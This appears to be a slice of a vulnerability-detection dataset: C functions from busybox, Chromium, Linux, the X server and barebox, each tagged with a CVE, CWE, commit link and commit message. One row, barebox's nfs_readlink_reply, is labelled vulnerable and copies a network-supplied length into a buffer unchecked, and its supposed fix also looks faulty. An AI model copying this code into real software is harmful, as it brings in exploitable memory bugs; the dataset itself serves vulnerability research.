INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ /*timeout = 0; - already is */ packet_num = 0; continue; /* case RELEASED: */ } /* yah, I know, *you* say it would never happen */ timeout = INT_MAX; continue; /* back to main loop */ } /* if select timed out */ /* select() didn't timeout, something happened */ /* Is it a signal? */ /* note: udhcp_sp_read checks FD_ISSET before reading */ switch (udhcp_sp_read(&rfds)) { case SIGUSR1: client_config.first_secs = 0; /* make secs field count from 0 */ already_waited_sec = 0; perform_renew(); if (state == RENEW_REQUESTED) { /* We might be either on the same network * (in which case renew might work), * or we might be on a completely different one * (in which case renew won't ever succeed). * For the second case, must make sure timeout * is not too big, or else we can send * futile renew requests for hours. * (Ab)use -A TIMEOUT value (usually 20 sec) * as a cap on the timeout. */ if (timeout > tryagain_timeout) timeout = tryagain_timeout; goto case_RENEW_REQUESTED; } /* Start things over */ packet_num = 0; /* Kill any timeouts, user wants this to hurry along */ timeout = 0; continue; case SIGUSR2: perform_release(server_addr, requested_ip); timeout = INT_MAX; continue; case SIGTERM: bb_info_msg("Received SIGTERM"); goto ret0; } /* Is it a packet? */ if (listen_mode == LISTEN_NONE || !FD_ISSET(sockfd, &rfds)) continue; /* no */ { int len; /* A packet is ready, read it */ if (listen_mode == LISTEN_KERNEL) len = udhcp_recv_kernel_packet(&packet, sockfd); else len = udhcp_recv_raw_packet(&packet, sockfd); if (len == -1) { /* Error is severe, reopen socket */ bb_info_msg("Read error: %s, reopening socket", strerror(errno)); sleep(discover_timeout); /* 3 seconds by default */ change_listen_mode(listen_mode); /* just close and reopen */ } /* If this packet will turn out to be unrelated/bogus, * we will go back and wait for next one. * Be sure timeout is properly decreased. */ already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; if (len < 0) continue; } if (packet.xid != xid) { log1("xid %x (our is %x), ignoring packet", (unsigned)packet.xid, (unsigned)xid); continue; } /* Ignore packets that aren't for us */ if (packet.hlen != 6 || memcmp(packet.chaddr, client_config.client_mac, 6) != 0 ) { log1("chaddr does not match, ignoring packet"); // log2? continue; } message = udhcp_get_option(&packet, DHCP_MESSAGE_TYPE); if (message == NULL) { bb_error_msg("no message type option, ignoring packet"); continue; } switch (state) { case INIT_SELECTING: /* Must be a DHCPOFFER */ if (*message == DHCPOFFER) { uint8_t *temp; /* What exactly is server's IP? There are several values. * Example DHCP offer captured with tchdump: * * 10.34.25.254:67 > 10.34.25.202:68 // IP header's src * BOOTP fields: * Your-IP 10.34.25.202 * Server-IP 10.34.32.125 // "next server" IP * Gateway-IP 10.34.25.254 // relay's address (if DHCP relays are in use) * DHCP options: * DHCP-Message Option 53, length 1: Offer * Server-ID Option 54, length 4: 10.34.255.7 // "server ID" * Default-Gateway Option 3, length 4: 10.34.25.254 // router * * We think that real server IP (one to use in renew/release) * is one in Server-ID option. But I am not 100% sure. * IP header's src and Gateway-IP (same in this example) * might work too. * "Next server" and router are definitely wrong ones to use, though... */ /* We used to ignore pcakets without DHCP_SERVER_ID. * I've got user reports from people who run "address-less" servers. * They either supply DHCP_SERVER_ID of 0.0.0.0 or don't supply it at all. * They say ISC DHCP client supports this case. */ server_addr = 0; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { bb_error_msg("no server ID, using 0.0.0.0"); } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(server_addr, temp); } /*xid = packet.xid; - already is */ requested_ip = packet.yiaddr; /* enter requesting state */ state = REQUESTING; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; case REQUESTING: case RENEWING: case RENEW_REQUESTED: case REBINDING: if (*message == DHCPACK) { unsigned start; uint32_t lease_seconds; struct in_addr temp_addr; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_LEASE_TIME); if (!temp) { bb_error_msg("no lease time with ACK, using 1 hour lease"); lease_seconds = 60 * 60; } else { /* it IS unaligned sometimes, don't "optimize" */ move_from_unaligned32(lease_seconds, temp); lease_seconds = ntohl(lease_seconds); /* paranoia: must not be too small and not prone to overflows */ if (lease_seconds < 0x10) lease_seconds = 0x10; if (lease_seconds >= 0x10000000) lease_seconds = 0x0fffffff; } #if ENABLE_FEATURE_UDHCPC_ARPING if (opt & OPT_a) { /* RFC 2131 3.1 paragraph 5: * "The client receives the DHCPACK message with configuration * parameters. The client SHOULD perform a final check on the * parameters (e.g., ARP for allocated network address), and notes * the duration of the lease specified in the DHCPACK message. At this * point, the client is configured. If the client detects that the * address is already in use (e.g., through the use of ARP), * the client MUST send a DHCPDECLINE message to the server and restarts * the configuration process..." */ if (!arpping(packet.yiaddr, NULL, (uint32_t) 0, client_config.client_mac, client_config.interface, arpping_ms) ) { bb_info_msg("Offered address is in use " "(got ARP reply), declining"); send_decline(/*xid,*/ server_addr, packet.yiaddr); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = tryagain_timeout; packet_num = 0; already_waited_sec = 0; continue; /* back to main loop */ } } #endif /* enter bound state */ temp_addr.s_addr = packet.yiaddr; bb_info_msg("Lease of %s obtained, lease time %u", inet_ntoa(temp_addr), (unsigned)lease_seconds); requested_ip = packet.yiaddr; start = monotonic_sec(); udhcp_run_script(&packet, state == REQUESTING ? "bound" : "renew"); already_waited_sec = (unsigned)monotonic_sec() - start; timeout = lease_seconds / 2; if ((unsigned)timeout < already_waited_sec) { /* Something went wrong. Back to discover state */ timeout = already_waited_sec = 0; } state = BOUND; change_listen_mode(LISTEN_NONE); if (opt & OPT_q) { /* quit after lease */ goto ret0; } /* future renew failures should not exit (JM) */ opt &= ~OPT_n; #if BB_MMU /* NOMMU case backgrounded earlier */ if (!(opt & OPT_f)) { client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } #endif /* make future renew packets use different xid */ /* xid = random_xid(); ...but why bother? */ continue; /* back to main loop */ } if (*message == DHCPNAK) { /* If network has more than one DHCP server, * "wrong" server can reply first, with a NAK. * Do not interpret it as a NAK from "our" server. */ if (server_addr != 0) { uint32_t svid; uint8_t *temp; temp = udhcp_get_option(&packet, DHCP_SERVER_ID); if (!temp) { non_matching_svid: log1("%s with wrong server ID, ignoring packet", "Received DHCP NAK" ); continue; } move_from_unaligned32(svid, temp); if (svid != server_addr) goto non_matching_svid; } /* return to init state */ bb_info_msg("Received DHCP NAK"); udhcp_run_script(&packet, "nak"); if (state != REQUESTING) udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); sleep(3); /* avoid excessive network traffic */ state = INIT_SELECTING; client_config.first_secs = 0; /* make secs field count from 0 */ requested_ip = 0; timeout = 0; packet_num = 0; already_waited_sec = 0; } continue; /* case BOUND: - ignore all packets */ /* case RELEASED: - ignore all packets */ } /* back to main loop */ } /* for (;;) - main loop ends */ ret0: if (opt & OPT_R) /* release on quit */ perform_release(server_addr, requested_ip); retval = 0; ret: /*if (client_config.pidfile) - remove_pidfile has its own check */ remove_pidfile(client_config.pidfile); return retval; }
C
busybox
0
CVE-2017-5112
https://www.cvedetails.com/cve/CVE-2017-5112/
CWE-119
https://github.com/chromium/chromium/commit/f6ac1dba5e36f338a490752a2cbef3339096d9fe
f6ac1dba5e36f338a490752a2cbef3339096d9fe
Reset ES3 pixel pack parameters and PIXEL_PACK_BUFFER binding in DrawingBuffer before ReadPixels() and recover them later. BUG=740603 TEST=new conformance test [email protected],[email protected] Change-Id: I3ea54c6cc34f34e249f7c8b9f792d93c5e1958f4 Reviewed-on: https://chromium-review.googlesource.com/570840 Reviewed-by: Antoine Labour <[email protected]> Reviewed-by: Kenneth Russell <[email protected]> Commit-Queue: Zhenyao Mo <[email protected]> Cr-Commit-Position: refs/heads/master@{#486518}
WebGLFramebuffer* WebGL2RenderingContextBase::GetReadFramebufferBinding() { return read_framebuffer_binding_.Get(); }
WebGLFramebuffer* WebGL2RenderingContextBase::GetReadFramebufferBinding() { return read_framebuffer_binding_.Get(); }
C
Chrome
0
CVE-2012-5375
https://www.cvedetails.com/cve/CVE-2012-5375/
CWE-310
https://github.com/torvalds/linux/commit/9c52057c698fb96f8f07e7a4bcf4801a092bda89
9c52057c698fb96f8f07e7a4bcf4801a092bda89
Btrfs: fix hash overflow handling The handling for directory crc hash overflows was fairly obscure, split_leaf returns EOVERFLOW when we try to extend the item and that is supposed to bubble up to userland. For a while it did so, but along the way we added better handling of errors and forced the FS readonly if we hit IO errors during the directory insertion. Along the way, we started testing only for EEXIST and the EOVERFLOW case was dropped. The end result is that we may force the FS readonly if we catch a directory hash bucket overflow. This fixes a few problem spots. First I add tests for EOVERFLOW in the places where we can safely just return the error up the chain. btrfs_rename is harder though, because it tries to insert the new directory item only after it has already unlinked anything the rename was going to overwrite. Rather than adding very complex logic, I added a helper to test for the hash overflow case early while it is still safe to bail out. Snapshot and subvolume creation had a similar problem, so they are using the new helper now too. Signed-off-by: Chris Mason <[email protected]> Reported-by: Pascal Junod <[email protected]>
static noinline void async_cow_free(struct btrfs_work *work) { struct async_cow *async_cow; async_cow = container_of(work, struct async_cow, work); if (async_cow->inode) btrfs_add_delayed_iput(async_cow->inode); kfree(async_cow); }
static noinline void async_cow_free(struct btrfs_work *work) { struct async_cow *async_cow; async_cow = container_of(work, struct async_cow, work); if (async_cow->inode) btrfs_add_delayed_iput(async_cow->inode); kfree(async_cow); }
C
linux
0
CVE-2013-2908
https://www.cvedetails.com/cve/CVE-2013-2908/
null
https://github.com/chromium/chromium/commit/7edf2c655761e7505950013e62c89e3bd2f7e6dc
7edf2c655761e7505950013e62c89e3bd2f7e6dc
Call didAccessInitialDocument when javascript: URLs are used. BUG=265221 TEST=See bug for repro. Review URL: https://chromiumcodereview.appspot.com/22572004 git-svn-id: svn://svn.chromium.org/blink/trunk@155790 bbb929c8-8fbe-4397-9dbb-9b2b20218538
WebFrameTest() : m_baseURL("http://www.test.com/") , m_chromeURL("chrome://") , m_webView(0) { }
WebFrameTest() : m_baseURL("http://www.test.com/") , m_chromeURL("chrome://") , m_webView(0) { }
C
Chrome
0
CVE-2011-4029
https://www.cvedetails.com/cve/CVE-2011-4029/
CWE-362
https://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4
b67581cf825940fdf52bf2e0af4330e695d724a4
null
set_font_authorizations(char **authorizations, int *authlen, pointer client) { #define AUTHORIZATION_NAME "hp-hostname-1" #if defined(TCPCONN) || defined(STREAMSCONN) static char *result = NULL; static char *p = NULL; if (p == NULL) { char hname[1024], *hnameptr; unsigned int len; #if defined(IPv6) && defined(AF_INET6) struct addrinfo hints, *ai = NULL; #else struct hostent *host; #ifdef XTHREADS_NEEDS_BYNAMEPARAMS _Xgethostbynameparams hparams; #endif #endif gethostname(hname, 1024); #if defined(IPv6) && defined(AF_INET6) memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_CANONNAME; if (getaddrinfo(hname, NULL, &hints, &ai) == 0) { hnameptr = ai->ai_canonname; } else { hnameptr = hname; } #else host = _XGethostbyname(hname, hparams); if (host == NULL) hnameptr = hname; else hnameptr = host->h_name; #endif len = strlen(hnameptr) + 1; result = malloc(len + sizeof(AUTHORIZATION_NAME) + 4); p = result; *p++ = sizeof(AUTHORIZATION_NAME) >> 8; *p++ = sizeof(AUTHORIZATION_NAME) & 0xff; *p++ = (len) >> 8; *p++ = (len & 0xff); memmove(p, AUTHORIZATION_NAME, sizeof(AUTHORIZATION_NAME)); p += sizeof(AUTHORIZATION_NAME); memmove(p, hnameptr, len); p += len; #if defined(IPv6) && defined(AF_INET6) if (ai) { freeaddrinfo(ai); } #endif } *authlen = p - result; *authorizations = result; return 1; #else /* TCPCONN */ return 0; #endif /* TCPCONN */ }
set_font_authorizations(char **authorizations, int *authlen, pointer client) { #define AUTHORIZATION_NAME "hp-hostname-1" #if defined(TCPCONN) || defined(STREAMSCONN) static char *result = NULL; static char *p = NULL; if (p == NULL) { char hname[1024], *hnameptr; unsigned int len; #if defined(IPv6) && defined(AF_INET6) struct addrinfo hints, *ai = NULL; #else struct hostent *host; #ifdef XTHREADS_NEEDS_BYNAMEPARAMS _Xgethostbynameparams hparams; #endif #endif gethostname(hname, 1024); #if defined(IPv6) && defined(AF_INET6) memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_CANONNAME; if (getaddrinfo(hname, NULL, &hints, &ai) == 0) { hnameptr = ai->ai_canonname; } else { hnameptr = hname; } #else host = _XGethostbyname(hname, hparams); if (host == NULL) hnameptr = hname; else hnameptr = host->h_name; #endif len = strlen(hnameptr) + 1; result = malloc(len + sizeof(AUTHORIZATION_NAME) + 4); p = result; *p++ = sizeof(AUTHORIZATION_NAME) >> 8; *p++ = sizeof(AUTHORIZATION_NAME) & 0xff; *p++ = (len) >> 8; *p++ = (len & 0xff); memmove(p, AUTHORIZATION_NAME, sizeof(AUTHORIZATION_NAME)); p += sizeof(AUTHORIZATION_NAME); memmove(p, hnameptr, len); p += len; #if defined(IPv6) && defined(AF_INET6) if (ai) { freeaddrinfo(ai); } #endif } *authlen = p - result; *authorizations = result; return 1; #else /* TCPCONN */ return 0; #endif /* TCPCONN */ }
C
xserver
0
CVE-2016-5216
https://www.cvedetails.com/cve/CVE-2016-5216/
CWE-416
https://github.com/chromium/chromium/commit/bf6a6765d44b09c64b8c75d749efb84742a250e7
bf6a6765d44b09c64b8c75d749efb84742a250e7
[pdf] Defer page unloading in JS callback. One of the callbacks from PDFium JavaScript into the embedder is to get the current page number. In Chromium, this will trigger a call to CalculateMostVisiblePage that method will determine the visible pages and unload any non-visible pages. But, if the originating JS is on a non-visible page we'll delete the page and annotations associated with that page. This will cause issues as we are currently working with those objects when the JavaScript returns. This Cl defers the page unloading triggered by getting the most visible page until the next event is handled by the Chromium embedder. BUG=chromium:653090 Review-Url: https://codereview.chromium.org/2418533002 Cr-Commit-Position: refs/heads/master@{#424781}
void* MapFont(struct _FPDF_SYSFONTINFO*, int weight, int italic, int charset, int pitch_family, const char* face, int* exact) { if (!pp::Module::Get()) return nullptr; pp::BrowserFontDescription description; if (strcmp(face, "Symbol") == 0) return nullptr; if (pitch_family & FXFONT_FF_FIXEDPITCH) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_MONOSPACE); } else if (pitch_family & FXFONT_FF_ROMAN) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_SERIF); } static const struct { const char* pdf_name; const char* face; bool bold; bool italic; } kPdfFontSubstitutions[] = { {"Courier", "Courier New", false, false}, {"Courier-Bold", "Courier New", true, false}, {"Courier-BoldOblique", "Courier New", true, true}, {"Courier-Oblique", "Courier New", false, true}, {"Helvetica", "Arial", false, false}, {"Helvetica-Bold", "Arial", true, false}, {"Helvetica-BoldOblique", "Arial", true, true}, {"Helvetica-Oblique", "Arial", false, true}, {"Times-Roman", "Times New Roman", false, false}, {"Times-Bold", "Times New Roman", true, false}, {"Times-BoldItalic", "Times New Roman", true, true}, {"Times-Italic", "Times New Roman", false, true}, {"MS-PGothic", "MS PGothic", false, false}, {"MS-Gothic", "MS Gothic", false, false}, {"MS-PMincho", "MS PMincho", false, false}, {"MS-Mincho", "MS Mincho", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x83\x53\x83\x56\x83\x62\x83\x4E", "MS PGothic", false, false}, {"\x82\x6C\x82\x72\x83\x53\x83\x56\x83\x62\x83\x4E", "MS Gothic", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x96\xBE\x92\xA9", "MS PMincho", false, false}, {"\x82\x6C\x82\x72\x96\xBE\x92\xA9", "MS Mincho", false, false}, }; if (charset == FXFONT_ANSI_CHARSET && (pitch_family & FXFONT_FF_FIXEDPITCH)) face = "Courier New"; size_t i; for (i = 0; i < arraysize(kPdfFontSubstitutions); ++i) { if (strcmp(face, kPdfFontSubstitutions[i].pdf_name) == 0) { description.set_face(kPdfFontSubstitutions[i].face); if (kPdfFontSubstitutions[i].bold) description.set_weight(PP_BROWSERFONT_TRUSTED_WEIGHT_BOLD); if (kPdfFontSubstitutions[i].italic) description.set_italic(true); break; } } if (i == arraysize(kPdfFontSubstitutions)) { std::string face_utf8; if (base::IsStringUTF8(face)) { face_utf8 = face; } else { std::string encoding; if (base::DetectEncoding(face, &encoding)) { base::ConvertToUtf8AndNormalize(face, encoding, &face_utf8); } } if (face_utf8.empty()) return nullptr; description.set_face(face_utf8); description.set_weight(WeightToBrowserFontTrustedWeight(weight)); description.set_italic(italic > 0); } if (!pp::PDF::IsAvailable()) { NOTREACHED(); return nullptr; } PP_Resource font_resource = pp::PDF::GetFontFileWithFallback( pp::InstanceHandle(g_last_instance_id), &description.pp_font_description(), static_cast<PP_PrivateFontCharset>(charset)); long res_id = font_resource; return reinterpret_cast<void*>(res_id); }
void* MapFont(struct _FPDF_SYSFONTINFO*, int weight, int italic, int charset, int pitch_family, const char* face, int* exact) { if (!pp::Module::Get()) return nullptr; pp::BrowserFontDescription description; if (strcmp(face, "Symbol") == 0) return nullptr; if (pitch_family & FXFONT_FF_FIXEDPITCH) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_MONOSPACE); } else if (pitch_family & FXFONT_FF_ROMAN) { description.set_family(PP_BROWSERFONT_TRUSTED_FAMILY_SERIF); } static const struct { const char* pdf_name; const char* face; bool bold; bool italic; } kPdfFontSubstitutions[] = { {"Courier", "Courier New", false, false}, {"Courier-Bold", "Courier New", true, false}, {"Courier-BoldOblique", "Courier New", true, true}, {"Courier-Oblique", "Courier New", false, true}, {"Helvetica", "Arial", false, false}, {"Helvetica-Bold", "Arial", true, false}, {"Helvetica-BoldOblique", "Arial", true, true}, {"Helvetica-Oblique", "Arial", false, true}, {"Times-Roman", "Times New Roman", false, false}, {"Times-Bold", "Times New Roman", true, false}, {"Times-BoldItalic", "Times New Roman", true, true}, {"Times-Italic", "Times New Roman", false, true}, {"MS-PGothic", "MS PGothic", false, false}, {"MS-Gothic", "MS Gothic", false, false}, {"MS-PMincho", "MS PMincho", false, false}, {"MS-Mincho", "MS Mincho", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x83\x53\x83\x56\x83\x62\x83\x4E", "MS PGothic", false, false}, {"\x82\x6C\x82\x72\x83\x53\x83\x56\x83\x62\x83\x4E", "MS Gothic", false, false}, {"\x82\x6C\x82\x72\x82\x6F\x96\xBE\x92\xA9", "MS PMincho", false, false}, {"\x82\x6C\x82\x72\x96\xBE\x92\xA9", "MS Mincho", false, false}, }; if (charset == FXFONT_ANSI_CHARSET && (pitch_family & FXFONT_FF_FIXEDPITCH)) face = "Courier New"; size_t i; for (i = 0; i < arraysize(kPdfFontSubstitutions); ++i) { if (strcmp(face, kPdfFontSubstitutions[i].pdf_name) == 0) { description.set_face(kPdfFontSubstitutions[i].face); if (kPdfFontSubstitutions[i].bold) description.set_weight(PP_BROWSERFONT_TRUSTED_WEIGHT_BOLD); if (kPdfFontSubstitutions[i].italic) description.set_italic(true); break; } } if (i == arraysize(kPdfFontSubstitutions)) { std::string face_utf8; if (base::IsStringUTF8(face)) { face_utf8 = face; } else { std::string encoding; if (base::DetectEncoding(face, &encoding)) { base::ConvertToUtf8AndNormalize(face, encoding, &face_utf8); } } if (face_utf8.empty()) return nullptr; description.set_face(face_utf8); description.set_weight(WeightToBrowserFontTrustedWeight(weight)); description.set_italic(italic > 0); } if (!pp::PDF::IsAvailable()) { NOTREACHED(); return nullptr; } PP_Resource font_resource = pp::PDF::GetFontFileWithFallback( pp::InstanceHandle(g_last_instance_id), &description.pp_font_description(), static_cast<PP_PrivateFontCharset>(charset)); long res_id = font_resource; return reinterpret_cast<void*>(res_id); }
C
Chrome
0
CVE-2012-6541
https://www.cvedetails.com/cve/CVE-2012-6541/
CWE-200
https://github.com/torvalds/linux/commit/7b07f8eb75aa3097cdfd4f6eac3da49db787381d
7b07f8eb75aa3097cdfd4f6eac3da49db787381d
dccp: fix info leak via getsockopt(DCCP_SOCKOPT_CCID_TX_INFO) The CCID3 code fails to initialize the trailing padding bytes of struct tfrc_tx_info added for alignment on 64 bit architectures. It that for potentially leaks four bytes kernel stack via the getsockopt() syscall. Add an explicit memset(0) before filling the structure to avoid the info leak. Signed-off-by: Mathias Krause <[email protected]> Cc: Gerrit Renker <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static void ccid3_hc_tx_exit(struct sock *sk) { struct ccid3_hc_tx_sock *hc = ccid3_hc_tx_sk(sk); sk_stop_timer(sk, &hc->tx_no_feedback_timer); tfrc_tx_hist_purge(&hc->tx_hist); }
static void ccid3_hc_tx_exit(struct sock *sk) { struct ccid3_hc_tx_sock *hc = ccid3_hc_tx_sk(sk); sk_stop_timer(sk, &hc->tx_no_feedback_timer); tfrc_tx_hist_purge(&hc->tx_hist); }
C
linux
0
CVE-2012-2875
https://www.cvedetails.com/cve/CVE-2012-2875/
null
https://github.com/chromium/chromium/commit/1266ba494530a267ec8a21442ea1b5cae94da4fb
1266ba494530a267ec8a21442ea1b5cae94da4fb
Introduce XGetImage() for GrabWindowSnapshot() in ChromeOS. BUG=119492 TEST=manually done Review URL: https://chromiumcodereview.appspot.com/10386124 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@137556 0039d316-1c4b-4281-b951-d872f2087c98
void RootWindowHostLinux::MoveCursorTo(const gfx::Point& location) { XWarpPointer(xdisplay_, None, xwindow_, 0, 0, 0, 0, location.x(), location.y()); }
void RootWindowHostLinux::MoveCursorTo(const gfx::Point& location) { XWarpPointer(xdisplay_, None, xwindow_, 0, 0, 0, 0, location.x(), location.y()); }
C
Chrome
0
CVE-2016-1696
https://www.cvedetails.com/cve/CVE-2016-1696/
CWE-284
https://github.com/chromium/chromium/commit/c0569cc04741cccf6548c2169fcc1609d958523f
c0569cc04741cccf6548c2169fcc1609d958523f
[Extensions] Expand bindings access checks BUG=601149 BUG=601073 Review URL: https://codereview.chromium.org/1866103002 Cr-Commit-Position: refs/heads/master@{#387710}
void DisplaySourceCustomBindings::TerminateSession( const v8::FunctionCallbackInfo<v8::Value>& args) { CHECK_EQ(1, args.Length()); CHECK(args[0]->IsInt32()); v8::Isolate* isolate = context()->isolate(); int sink_id = args[0]->ToInt32(args.GetIsolate())->Value(); DisplaySourceSession* session = GetDisplaySession(sink_id); if (!session) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionNotFound))); return; } DisplaySourceSession::State state = session->state(); DCHECK_NE(state, DisplaySourceSession::Idle); if (state == DisplaySourceSession::Establishing) { isolate->ThrowException(v8::Exception::Error( v8::String::NewFromUtf8(isolate, kSessionNotFound))); return; } if (state == DisplaySourceSession::Terminating) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionAlreadyTerminating))); return; } int32_t call_id = GetCallbackId(); args.GetReturnValue().Set(call_id); auto on_call_completed = base::Bind(&DisplaySourceCustomBindings::OnCallCompleted, weak_factory_.GetWeakPtr(), call_id); session->Terminate(on_call_completed); }
void DisplaySourceCustomBindings::TerminateSession( const v8::FunctionCallbackInfo<v8::Value>& args) { CHECK_EQ(1, args.Length()); CHECK(args[0]->IsInt32()); v8::Isolate* isolate = context()->isolate(); int sink_id = args[0]->ToInt32(args.GetIsolate())->Value(); DisplaySourceSession* session = GetDisplaySession(sink_id); if (!session) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionNotFound))); return; } DisplaySourceSession::State state = session->state(); DCHECK_NE(state, DisplaySourceSession::Idle); if (state == DisplaySourceSession::Establishing) { isolate->ThrowException(v8::Exception::Error( v8::String::NewFromUtf8(isolate, kSessionNotFound))); return; } if (state == DisplaySourceSession::Terminating) { isolate->ThrowException(v8::Exception::Error(v8::String::NewFromUtf8( isolate, kSessionAlreadyTerminating))); return; } int32_t call_id = GetCallbackId(); args.GetReturnValue().Set(call_id); auto on_call_completed = base::Bind(&DisplaySourceCustomBindings::OnCallCompleted, weak_factory_.GetWeakPtr(), call_id); session->Terminate(on_call_completed); }
C
Chrome
0
CVE-2019-15937
https://www.cvedetails.com/cve/CVE-2019-15937/
CWE-119
https://git.pengutronix.de/cgit/barebox/commit/net/nfs.c?h=next&id=84986ca024462058574432b5483f4bf9136c538d
84986ca024462058574432b5483f4bf9136c538d
null
static int nfs_readlink_reply(unsigned char *pkt, unsigned len) { uint32_t *data; char *path; unsigned int rlen; int ret; ret = rpc_check_reply(pkt, 1); if (ret) return ret; data = (uint32_t *)(pkt + sizeof(struct rpc_reply)); data++; rlen = ntohl(net_read_uint32(data)); /* new path length */ rlen = max_t(unsigned int, rlen, len - sizeof(struct rpc_reply) - sizeof(uint32_t)); data++; path = (char *)data; } else { memcpy(nfs_path, path, rlen); nfs_path[rlen] = 0; }
static int nfs_readlink_reply(unsigned char *pkt, unsigned len) { uint32_t *data; char *path; int rlen; int ret; ret = rpc_check_reply(pkt, 1); if (ret) return ret; data = (uint32_t *)(pkt + sizeof(struct rpc_reply)); data++; rlen = ntohl(net_read_uint32(data)); /* new path length */ data++; path = (char *)data; } else { memcpy(nfs_path, path, rlen); nfs_path[rlen] = 0; }
C
pengutronix
1
CVE-2017-7277
https://www.cvedetails.com/cve/CVE-2017-7277/
CWE-125
https://github.com/torvalds/linux/commit/8605330aac5a5785630aec8f64378a54891937cc
8605330aac5a5785630aec8f64378a54891937cc
tcp: fix SCM_TIMESTAMPING_OPT_STATS for normal skbs __sock_recv_timestamp can be called for both normal skbs (for receive timestamps) and for skbs on the error queue (for transmit timestamps). Commit 1c885808e456 (tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING) assumes any skb passed to __sock_recv_timestamp are from the error queue, containing OPT_STATS in the content of the skb. This results in accessing invalid memory or generating junk data. To fix this, set skb->pkt_type to PACKET_OUTGOING for packets on the error queue. This is safe because on the receive path on local sockets skb->pkt_type is never set to PACKET_OUTGOING. With that, copy OPT_STATS from a packet, only if its pkt_type is PACKET_OUTGOING. Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING") Reported-by: JongHwan Kim <[email protected]> Signed-off-by: Soheil Hassas Yeganeh <[email protected]> Signed-off-by: Eric Dumazet <[email protected]> Signed-off-by: Willem de Bruijn <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void __kfree_skb_defer(struct sk_buff *skb) { _kfree_skb_defer(skb); }
void __kfree_skb_defer(struct sk_buff *skb) { _kfree_skb_defer(skb); }
C
linux
0
CVE-2016-7425
https://www.cvedetails.com/cve/CVE-2016-7425/
CWE-119
https://github.com/torvalds/linux/commit/7bc2b55a5c030685b399bb65b6baa9ccc3d1f167
7bc2b55a5c030685b399bb65b6baa9ccc3d1f167
scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() We need to put an upper bound on "user_len" so the memcpy() doesn't overflow. Cc: <[email protected]> Reported-by: Marco Grassi <[email protected]> Signed-off-by: Dan Carpenter <[email protected]> Reviewed-by: Tomas Henzl <[email protected]> Signed-off-by: Martin K. Petersen <[email protected]>
static void arcmsr_hbaD_start_bgrb(struct AdapterControlBlock *pACB) { struct MessageUnit_D *pmu = pACB->pmuD; pACB->acb_flags |= ACB_F_MSG_START_BGRB; writel(ARCMSR_INBOUND_MESG0_START_BGRB, pmu->inbound_msgaddr0); if (!arcmsr_hbaD_wait_msgint_ready(pACB)) { pr_notice("arcmsr%d: wait 'start adapter " "background rebulid' timeout\n", pACB->host->host_no); } }
static void arcmsr_hbaD_start_bgrb(struct AdapterControlBlock *pACB) { struct MessageUnit_D *pmu = pACB->pmuD; pACB->acb_flags |= ACB_F_MSG_START_BGRB; writel(ARCMSR_INBOUND_MESG0_START_BGRB, pmu->inbound_msgaddr0); if (!arcmsr_hbaD_wait_msgint_ready(pACB)) { pr_notice("arcmsr%d: wait 'start adapter " "background rebulid' timeout\n", pACB->host->host_no); } }
C
linux
0
CVE-2014-3610
https://www.cvedetails.com/cve/CVE-2014-3610/
CWE-264
https://github.com/torvalds/linux/commit/854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
854e8bb1aa06c578c2c9145fa6bfe3680ef63b23
KVM: x86: Check non-canonical addresses upon WRMSR Upon WRMSR, the CPU should inject #GP if a non-canonical value (address) is written to certain MSRs. The behavior is "almost" identical for AMD and Intel (ignoring MSRs that are not implemented in either architecture since they would anyhow #GP). However, IA32_SYSENTER_ESP and IA32_SYSENTER_EIP cause #GP if non-canonical address is written on Intel but not on AMD (which ignores the top 32-bits). Accordingly, this patch injects a #GP on the MSRs which behave identically on Intel and AMD. To eliminate the differences between the architecutres, the value which is written to IA32_SYSENTER_ESP and IA32_SYSENTER_EIP is turned to canonical value before writing instead of injecting a #GP. Some references from Intel and AMD manuals: According to Intel SDM description of WRMSR instruction #GP is expected on WRMSR "If the source register contains a non-canonical address and ECX specifies one of the following MSRs: IA32_DS_AREA, IA32_FS_BASE, IA32_GS_BASE, IA32_KERNEL_GS_BASE, IA32_LSTAR, IA32_SYSENTER_EIP, IA32_SYSENTER_ESP." According to AMD manual instruction manual: LSTAR/CSTAR (SYSCALL): "The WRMSR instruction loads the target RIP into the LSTAR and CSTAR registers. If an RIP written by WRMSR is not in canonical form, a general-protection exception (#GP) occurs." IA32_GS_BASE and IA32_FS_BASE (WRFSBASE/WRGSBASE): "The address written to the base field must be in canonical form or a #GP fault will occur." IA32_KERNEL_GS_BASE (SWAPGS): "The address stored in the KernelGSbase MSR must be in canonical form." This patch fixes CVE-2014-3610. Cc: [email protected] Signed-off-by: Nadav Amit <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
